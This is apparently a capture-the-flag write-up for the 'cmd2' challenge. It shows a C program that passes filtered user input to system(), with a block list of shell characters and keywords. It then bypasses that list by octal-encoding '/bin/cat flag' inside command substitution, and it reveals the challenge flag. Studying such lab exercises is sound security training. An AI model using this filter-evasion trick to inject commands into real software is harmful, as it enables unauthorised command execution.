cmd2

References

source code

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
        int r=0;
        r += strstr(cmd, "=")!=0;
        r += strstr(cmd, "PATH")!=0;
        r += strstr(cmd, "export")!=0;
        r += strstr(cmd, "/")!=0;
        r += strstr(cmd, "`")!=0;
        r += strstr(cmd, "flag")!=0;
        return r;
}

extern char** environ;
void delete_env(){
        char** p;
        for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
        delete_env();
        putenv("PATH=/no_command_execution_until_you_become_a_hacker");
        if(filter(argv[1])) return 0;
        printf("%s\n", argv[1]);
        system( argv[1] );
        return 0;
}

Writeup

  • 與cmd1差不多,不過這邊過濾了更多字串
  • 方法一:
    • 先將/bin/cat flag轉成八進制
      >>> from pwn import *
      >>> cmd = "/bin/cat flag"
      >>> print "\\"+"\\".join([oct(i) for i in ordlist(cmd)])
      \057\0142\0151\0156\057\0143\0141\0164\040\0146\0154\0141\0147
      
    • 執行cmd2
      cmd2@ubuntu:~$ ./cmd2 '$(echo "\057\0142\0151\0156\057\0143\0141\0164\040\0146\0154\0141\014
      7")'
      $(echo "\057\0142\0151\0156\057\0143\0141\0164\040\0146\0154\0141\0147")
      FuN_w1th_5h3ll_v4riabl3s_haha
      
  • 方法二:

results matching ""

    No results matching ""